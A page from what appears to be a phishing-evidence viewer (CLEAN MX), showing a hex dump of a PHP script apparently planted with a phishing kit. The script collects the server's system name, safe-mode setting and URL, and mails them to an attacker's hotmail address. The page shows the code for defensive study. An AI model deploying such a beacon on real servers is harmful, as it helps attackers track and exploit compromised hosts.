CLEAN MX realtime database
safe Phish viewer

hex view of evidence ...

switching to first hex view of evidence ...
0: 3C3F7068700D0A2F2F3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D          <?php //=======================
32: 3D3D3D3D3D3D3D3D3D3D0D0A2F2F0D0A2F2F207363616E20696E62307820686F          ========== // // scan inb x ho
64: 746D61696C2076332E300D0A2F2F0D0A2F2F20636F6465642062792046696C68          tmail v3.  // // coded by Filh
96: 4F74655F43637320616E64204C4F53540D0A2F2F2072652D6330643364206279          Ote_Ccs and LOST // re-c d3d by
128: 2064656C65740D0A2F2F0D0A2F2F0D0A2F2F3D3D3D3D3D3D3D3D3D3D3D3D3D3D          delet // // //==============
160: 3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D0D0A2F2F0D0A696E695F736574          =================== // ini_set
192: 28226D61785F657865637574696F6E5F74696D65222C2D31293B0D0A7365745F          ("max_execution_time",-1); set_
224: 74696D655F6C696D69742830293B0D0A2475736572203D20406765745F637572          time_limit( ); $user = @get_cur
256: 72656E745F7573657228293B0D0A24554E414D45203D20407068705F756E616D          rent_user(); $UNAME = @php_unam
288: 6528293B0D0A24536166654D6F6465203D2040696E695F676574282773616665          e(); $SafeMode = @ini_get('safe
320: 5F6D6F646527293B0D0A206966202824536166654D6F6465203D3D2027272920          _mode'); if ($SafeMode == '')
352: 7B2024536166654D6F6465203D20224F4646223B207D0D0A20656C7365207B20          { $SafeMode = "OFF"; } else {
384: 24536166654D6F6465203D20222024536166654D6F646520223B207D0D0A2464          $SafeMode = " $SafeMode "; } $d
416: 656C65743D28245F5345525645525B27485454505F484F5354275D202E20245F          elet=($_SERVER['HTTP_HOST'] . $_
448: 5345525645525B27524551554553545F555249275D293B0D0A246461646F733D          SERVER['REQUEST_URI']); $dados=
480: 28223C623E50726F6475746F3C2F623E203D2022202E2024554E414D45202E20          ("<b>Produto</b> = " . $UNAME .
512: 220D0A3C693E5365677572616EE7613C2F693E203D2022202E2024536166654D          " <i>Segurança</i> = " . $SafeM
544: 6F6465202E20220D0A687474703A2F2F22202E202464656C6574202E2022200D          ode . " http://" . $delet . "
576: 0A0D0A4D7569746F206F6272696761646F20706F7220636F6D70726172206F20          Muito obrigado por comprar o
608: 686568653120636F6D3A203C753E64656C65743C2F753E22293B0D0A24656D61          hehe1 com: <u>delet</u>"); $ema
640: 696C203D20226262672D313240686F746D61696C2E636F6D223B0D0A24617373          il = "bbg-12@hotmail.com"; $ass
672: 756E746F203D202276616D6F73207665206E65206D6575206761726F74696E68          unto = "vamos ve ne meu garotinh
704: 6F223B0D0A24656D61696C31203D20226C696E69626572675F6D617274696E73          o"; $email1 = "liniberg_martins
736: 40686F746D61696C2E636F6D223B0D0A2468656164657273203D202246726F6D          @hotmail.com"; $headers = "From
768: 3A203C24656D61696C3E5C725C6E223B0D0A2468656164657273203D20224D49          : <$email>\r\n"; $headers = "MI
800: 4D452D56657273696F6E3A20312E305C725C6E223B0D0A246865616465727320          ME-Version: 1. \r\n"; $headers
832: 2E3D2022436F6E74656E742D747970653A20746578742F68746D6C3B20636861          .= "Content-type: text/html; cha
864: 727365743D69736F2D383835392D315C725C6E223B0D0A6966286D61696C2824          rset=iso-8859-1\r\n"; if(mail($
896: 656D61696C312C24617373756E746F2C246461646F732C246865616465727329          email1,$assunto,$dados,$headers)
928: 297B0D0A6563686F20224973736F2C206A6120666F6921223B0D0A6578697428          ){ echo "Isso, ja foi!"; exit(
960: 293B0D0A7D0D0A656C73657B0D0A6563686F20224EE36F20666F692E223B0D0A          ); } else{ echo "Não foi.";
992: 6578697428293B0D0A7D0D0A3F3E          exit(); } ?>